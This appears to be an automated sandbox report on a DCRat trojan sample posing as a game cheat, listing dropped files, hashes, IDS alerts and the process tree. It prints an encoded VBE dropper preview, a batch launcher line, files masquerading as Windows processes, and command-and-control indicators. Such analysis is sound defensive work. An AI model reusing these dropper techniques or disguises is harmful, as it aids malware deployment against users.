                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\blockweb\24dbde2999530e

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (828), with no line terminators
                                      Category:dropped
                                      Size (bytes):828
                                      Entropy (8bit):5.91211970465077
                                      Encrypted:false
                                      SSDEEP:24:zYx/zPcnRcz5Sm0jHYNnrhl+xf+Cs5g5d3li1:abkRcz5Sm+YNT+xfpoYX+
                                      MD5:1D57200EBD2758598804BEAED4072619
                                      SHA1:A6C5CAD2E445548C21208E060B4A1DFEBD532422
                                      SHA-256:C3CE52B6C99B5BA9215F96D228552DAC6C4E066CEDBE0FE0FE3EE7CBC9602FF0
                                      SHA-512:464A677925683C1C6F43852DE58FBC089882B7A603D6FD88C9669E2A5F8B9AC01F30F950E78A3199F108DB6569169798FDAEF4245812FE93FA9776667F8568E6
                                      Malicious:false
                                      Preview:1DPV9TGfqkDCYOR8R24yZ0MYLTsVyJfJunYZ04EFxZp61EjCtKGKb3ZA00KqkuqhF4Suz2IXxyA9KQgHtqmoDUr0NXj9uYeDsI17vzM1CsWm3a0kUC64ICduMcgcTInZU7RBYjV4dumU8E6xg8prbj4qoGuSTti3E7S6JyLurCbXaJwIgs6Ud67vCkWSyCkuMsPBw9osw49YIgQfUmwkxNaI9g3ib35obqLr3vVgDNhi6ingU18MQ979SHBPFGQ38V6bViliQPgjp1La3XNk5tYbsMZwtGb76ojllLLwPZ5AcYTa5lVs2q8P6ftJIyzKyjmASkysMbUfxY8U291IutFQqTpGbCnbkvM3vSHUwmfbVcbigZQJ7raFeVU85sRKx35CLFij1gWHNn4O2GkCvde3UHZZ8JZEVVncgZWa0qSaUS10bGGyHOYTZCrEpIlsHSv2AcrduJMELDiCPj82Cl6H6TDerRurFkSCg908YnD7CUIVepyGKtpgVo5qZMvdYe9luffQt9dZh8FmLrACcohV4wr2EJjL1kihUhk8JiXKQQ8WjSfrMtAu7nq8ynMjZRh6ahSnHB34QWFnyUTvn29Ikykq0mKfWxv8tB6BA1jK0FdkiDKdUa5gRYWm7lxf1XidlG4wXRuwTyReUAIxcqK52OqUpUEZEESchA8cIXGCpJNcG2R6dADLMmlXZjHDNVsOgz6TBpoEjIPsAONwDH5DBHP4ZkCjQDyUb96R575xV8lEX2XLWUAGaoNYjB4bmFygT5RAR51FLIrCfLhhN1N5Dr4wvhs3DeKQKEvbkW4ad44S6K3XeXNv22dl

                                      C:\blockweb\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (893), with no line terminators
                                      Category:dropped
                                      Size (bytes):893
                                      Entropy (8bit):5.906728732362466
                                      Encrypted:false
                                      SSDEEP:24:OEuDf/cxZCAr1R55e1Fsnq+0cvDd5ol3Plfv:buz/cvCG1R55qWfv5O3
                                      MD5:41AB28131C43D6E3D8112BAC2FCF8FC6
                                      SHA1:0CEE78D3766C1E3899B7CCAAEEE69FE69712ADBC
                                      SHA-256:291CC08147DF2F0CCED0C65424A5386FDA496DD6374F6263853A6BD458B15DE4
                                      SHA-512:8F15F84F43B62AE9C7C10FF58488030951AB1CE35ECD82A86CA4A13B9D231120D2AE934BEFD9692EAB285F22A6689D77417FFA7D0EECF65B99B8794BCB93A167
                                      Malicious:false
                                      Preview:E2mo5mTvgtXb9FEp6sOU94ovLDIMf6KEsvQ0ndSTo2toaIEuKsqYdE4JN1c2eHPjiTtNzNCdZ5qGLAUD8XBwPwkn1GnvAazgmJFHZ057qM9iYx8NhZ3GFdUwtFVskRd8GJeC4MoIcEGCwBOEIZNlhsbJzSXTeMWYtBcPS6SUuvnBWRAr0RkKD2aXsVMlyUnQrsTvi9vLH20vFZwiSpcNlMU1kFh7tqfZIXTo8OJ1fYCLBoRSioTI2ZofXbLcbycbWanrFIkDglrNJJz5xOZEXXhstxRgDqZr6lylBkMZEPmQsaWNmQpMZXD9258S1DA0M9RhVO3NC9AHuR9SbE4xBMSiiysFl4iAOwEtJz1XWbKZX5Ol5p0xJNy9qs9gfylHb938NQIlMgajB3KmkHJ6Du1A7ECb0V2hzC8YCQYpgPlmwO8xhX6XopEqH2BIOrv0o2u94wjTteZyJONsGO3dYe3K8SQKOPayeu84e92vxmoJPPg3oSC9yRbJ9jAmgZFeDlUZPTNGVIpw0t5svXf6Mb9MSz448QOYhKFo5GnUE5nqlpTPoR0I3IRmlHHaZTIF3RPpoQxpuL1QxTkmfpQqZGfY2cCx9M5vxixUanlXeLYrRAzRhe5tDbqxv0xLO9qhQGdOgPM2E2MNrxH1nvQeRLsV29jj0ZJef0bLhkvRSCpKPcF7t5idtMQEXHWgqmCosrs0W6TC98LOghGZ4l041qvTkXxaNOkpAAciuPlxlfdvACizB6mFwHwC6YQ8I3yvXgNfFhpo9DTWM9Tiz7ZQlf33OZmV9mosqsXeyCudR7Ftyaz6FrJLdhJ2nURq5UpXYkpemytwN69oaJExkpQRddOIif1dvEh6SsUNuUTQ8W7hifcdPdFQEY45Wh5H7

                                      C:\blockweb\9e8d7a4ca61bd9

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):163
                                      Entropy (8bit):5.624660673500774
                                      Encrypted:false
                                      SSDEEP:3:keJKvbJiH8zUz+O9uCAkaUHiuhN3oNjpPqUP6gwHQwi4w8d/55:keJK1k8I19uCBfiu7gjpnPawU5
                                      MD5:5F7295A9E004ADF1CF6455953577AF9C
                                      SHA1:D7A5BB99A46837369F1041C9CE42F7C62FB7299A
                                      SHA-256:000196373C8F4CCC0869E4FB254E9FCFCD5E1F83DFDEF182D93E4DD19C0FE6CF
                                      SHA-512:CE2C3FE19D6728D0AB70E0F84D6B66541519CDFAE981B8DAFC9C93737A48FB1FAE36EF4EEB71E7E1DDB9B14ABFD5D05411F2EB619F92C66A46E7C28D7F04A7B0
                                      Malicious:false
                                      Preview:xLnigBr4ge8CmTOJfbgoJihTaDlzmHlbYVSwGqJg8X9aXPccn8YoFqAOnUIca1RZ3gnQAbDzRAqviG6KlIMot7WrVDJwhrGHFkh0lLbL4iXFAOqhX71Ronq6K657SRSj3iq8iGjZqBtKkQrGXmYj0ycc3lppQe3nQxL

                                      C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):221
                                      Entropy (8bit):5.769434304613929
                                      Encrypted:false
                                      SSDEEP:6:G5kgwqK+NkLzWbHhE18nZNDd3RL1wQJR673gMmYY:G6BMCzWLy14d3XBJk3g4Y
                                      MD5:CA2CAE3C10113FC32484A48196E2FFAA
                                      SHA1:8EB74A53FE655C5B538246F42CC078D8900BF215
                                      SHA-256:98311058614DD00A0D0E9E9C38F9DF5D1D951525741FC46901D1A396BADDD8F2
                                      SHA-512:6CF05CA56F4C6320BC490401E742F81230E6C138651D958776F497D5E4889FE16C5853A1864791A3F10B4B3D103F5218894BE4C7009D1EB7B32E243111B166AF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:#@~^xAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JujH/O.:GDk7+u&4^W^3S+8&:rNMC%51MWA}2q3UkhZu4O+#Mc8lDJS~Z~PWC^/nhj4AAA==^#~@.

                                      C:\blockweb\RuntimeBroker.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):39
                                      Entropy (8bit):4.28126736094609
                                      Encrypted:false
                                      SSDEEP:3:wWATpKKhOin:yTpki
                                      MD5:19FE83FEEC263D4E4E68E3DD0E6B3615
                                      SHA1:7FF948A654D54ACFDE0E798FE1D67160343F8DFD
                                      SHA-256:07DC5ED69F4847071B41D0086EF8A11032C2D85B1EC8A8B00A5D29480C3E6744
                                      SHA-512:EE6FEF4211B60DFF50B7CDB88F9EC0028A67BC428AB854C0932DB7E5873F9A22E16760D59FF6B885FDB96ED7F6582D3735F629D6E825DCFD1E8C13C5D5ADAE78
                                      Malicious:false
                                      Preview:"%SystemDrive%\blockweb\portrefNet.exe"

                                      C:\blockweb\WmiPrvSE.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\blockweb\file.vbs

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):34
                                      Entropy (8bit):4.124083797069061
                                      Encrypted:false
                                      SSDEEP:3:LlzRWDNMSdn:PWbn
                                      MD5:677CC4360477C72CB0CE00406A949C61
                                      SHA1:B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
                                      SHA-256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
                                      SHA-512:7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
                                      Malicious:false
                                      Preview:MsgBox "TestDefault, Message!", 64

                                      C:\blockweb\portrefNet.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.99074200508439
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:FixTsDfhiC.exe
                                      File size:13'317'632 bytes
                                      MD5:bbd6ffdb33259778f08704696a04891f
                                      SHA1:0fd836bb4bfc035ff35ebe0fb47e4693cec9e8ba
                                      SHA256:841eb644979b3c640761762645c9cd26f9bb46e558eaeb7bf0c2a79e761878f4
                                      SHA512:1b66f11b3a3dea1e6a8f4f7ee493437a41e30704d1c80048efd245184a447fde6abf06fe45af0663a72b30b657a7297554df8c3af7b36ae2e0df21a5031a34e0
                                      SSDEEP:393216:2JlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8X:2bQpgssCKInwjJaMc
                                      TLSH:8DD633B760651386C0E5C63ACA37BED330F68F6F8A80A47955D9B9C12F36884D657B03
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                      File Icon

                                      Icon Hash:90cececece8e8eb0

                                      Static PE Info

                                      General

                                      Entrypoint:0x4020cc
                                      Entrypoint Section:CODE
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                      DLL Characteristics:
                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:d59a4a699610169663a929d37c90be43

                                      Entrypoint Preview

                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      mov ecx, 0000000Ch
                                      push 00000000h
                                      push 00000000h
                                      dec ecx
                                      jne 00007F5F2515ED5Bh
                                      push ecx
                                      push ebx
                                      push esi
                                      push edi
                                      mov eax, 0040209Ch
                                      call 00007F5F2515E7D0h
                                      xor eax, eax
                                      push ebp
                                      push 00402361h
                                      push dword ptr fs:[eax]
                                      mov dword ptr fs:[eax], esp
                                      lea edx, dword ptr [ebp-14h]
                                      mov eax, 00402378h
                                      call 00007F5F2515EBA9h
                                      mov eax, dword ptr [ebp-14h]
                                      call 00007F5F2515EC79h
                                      mov edi, eax
                                      test edi, edi
                                      jng 00007F5F2515EF96h
                                      mov ebx, 00000001h
                                      lea edx, dword ptr [ebp-20h]
                                      mov eax, ebx
                                      call 00007F5F2515EC38h
                                      mov ecx, dword ptr [ebp-20h]
                                      lea eax, dword ptr [ebp-1Ch]
                                      mov edx, 00402384h
                                      call 00007F5F2515E3C8h
                                      mov eax, dword ptr [ebp-1Ch]
                                      lea edx, dword ptr [ebp-18h]
                                      call 00007F5F2515EB6Dh
                                      mov edx, dword ptr [ebp-18h]
                                      mov eax, 00404680h
                                      call 00007F5F2515E2A0h
                                      lea edx, dword ptr [ebp-2Ch]
                                      mov eax, ebx
                                      call 00007F5F2515EC06h
                                      mov ecx, dword ptr [ebp-2Ch]
                                      lea eax, dword ptr [ebp-28h]
                                      mov edx, 00402390h
                                      call 00007F5F2515E396h
                                      mov eax, dword ptr [ebp-28h]
                                      lea edx, dword ptr [ebp-24h]
                                      call 00007F5F2515EB3Bh
                                      mov edx, dword ptr [ebp-24h]
                                      mov eax, 00404684h
                                      call 00007F5F2515E26Eh
                                      lea edx, dword ptr [ebp-38h]
                                      mov eax, ebx
                                      call 00007F5F2515EBD4h
                                      mov ecx, dword ptr [ebp-38h]
                                      lea eax, dword ptr [ebp-34h]
                                      mov edx, 0040239Ch

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x50000x302.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000xcb1358.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x1c8.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x70000x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      CODE0x10000x13b80x1400e5913936857bed3b3b2fbac53e973471False0.6318359375data6.340990548290613IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      DATA0x30000x7c0x200cef89de607e490725490a3cd679af6bbFalse0.162109375Matlab v4 mat-file (little endian) , numeric, rows 0, columns 42304001.1176271682252383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      BSS0x40000x6950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata0x50000x3020x4003d2f2fc4e279cba623217ec9de264c4fFalse0.3876953125data3.47731642923935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .tls0x60000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rdata0x70000x180x200467f29e48f3451df774e13adae5aafc2False0.05078125data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                      .reloc0x80000x1c80x2009859d413c7408cb699cca05d648c2502False0.876953125data5.7832974211095225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                      .rsrc0x90000xcb13580xcb140099aaaea1dc4a108b8e9b7129eb591074unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_RCDATA0x92940xcb0400PE32 executable (GUI) Intel 80386, for MS Windows0.9460124969482422
                                      RT_RCDATA0xcb96940xc3fASCII text0.19138755980861244
                                      RT_RCDATA0xcba2d40x13ASCII text, with no line terminators1.4210526315789473
                                      RT_RCDATA0xcba2e80x14ASCII text, with no line terminators1.4
                                      RT_RCDATA0xcba2fc0x1very short file (no magic)9.0
                                      RT_RCDATA0xcba3000x1very short file (no magic)9.0
                                      RT_RCDATA0xcba3040x1very short file (no magic)9.0
                                      RT_RCDATA0xcba3080x1very short file (no magic)9.0
                                      RT_RCDATA0xcba30c0x10data1.5
                                      RT_RCDATA0xcba31c0x1very short file (no magic)9.0
                                      RT_RCDATA0xcba3200x38data1.0714285714285714

                                      Imports

                                      DLLImport
                                      kernel32.dllGetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                      kernel32.dllWriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                      shfolder.dllSHGetFolderPathA
                                      shell32.dllShellExecuteA

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-30T08:43:02.046365+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44974592.53.106.11480TCP
                                      2024-10-30T08:43:13.265199+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44980392.53.106.11480TCP
                                      2024-10-30T08:43:27.937516+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44989092.53.106.11480TCP
                                      2024-10-30T08:43:51.421636+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.45001392.53.106.11480TCP
                                      2024-10-30T08:43:59.906040+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.45001692.53.106.11480TCP
                                      2024-10-30T08:44:07.859223+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.45001992.53.106.11480TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 30, 2024 08:42:19.291796923 CET4973180192.168.2.4208.95.112.1
                                      Oct 30, 2024 08:42:19.299493074 CET8049731208.95.112.1192.168.2.4
                                      Oct 30, 2024 08:42:19.299587965 CET4973180192.168.2.4208.95.112.1
                                      Oct 30, 2024 08:42:19.299786091 CET4973180192.168.2.4208.95.112.1
                                      Oct 30, 2024 08:42:19.305185080 CET8049731208.95.112.1192.168.2.4
                                      Oct 30, 2024 08:42:19.891028881 CET8049731208.95.112.1192.168.2.4
                                      Oct 30, 2024 08:42:19.902496099 CET4973180192.168.2.4208.95.112.1

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 30, 2024 08:42:19.280219078 CET6199553192.168.2.41.1.1.1
                                      Oct 30, 2024 08:42:19.290858984 CET53619951.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 30, 2024 08:42:19.280219078 CET192.168.2.41.1.1.10xc5bfStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 30, 2024 08:42:19.290858984 CET1.1.1.1192.168.2.40xc5bfNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • ip-api.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449731208.95.112.1808100C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 30, 2024 08:42:19.299786091 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Oct 30, 2024 08:42:19.891028881 CET174INHTTP/1.1 200 OK
                                      Date: Wed, 30 Oct 2024 07:42:19 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 5
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 74 72 75 65 0a
                                      Data Ascii: true


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:03:42:02
                                      Start date:30/10/2024
                                      Path:C:\Users\user\Desktop\FixTsDfhiC.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\FixTsDfhiC.exe"
                                      Imagebase:0x400000
                                      File size:13'317'632 bytes
                                      MD5 hash:BBD6FFDB33259778F08704696A04891F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:03:42:03
                                      Start date:30/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
                                      Imagebase:0x400000
                                      File size:13'304'832 bytes
                                      MD5 hash:7DB5128F7A81CC1AF094D8898E79FF21
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 75%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:03:42:05
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:03:42:05
                                      Start date:30/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:03:42:05
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
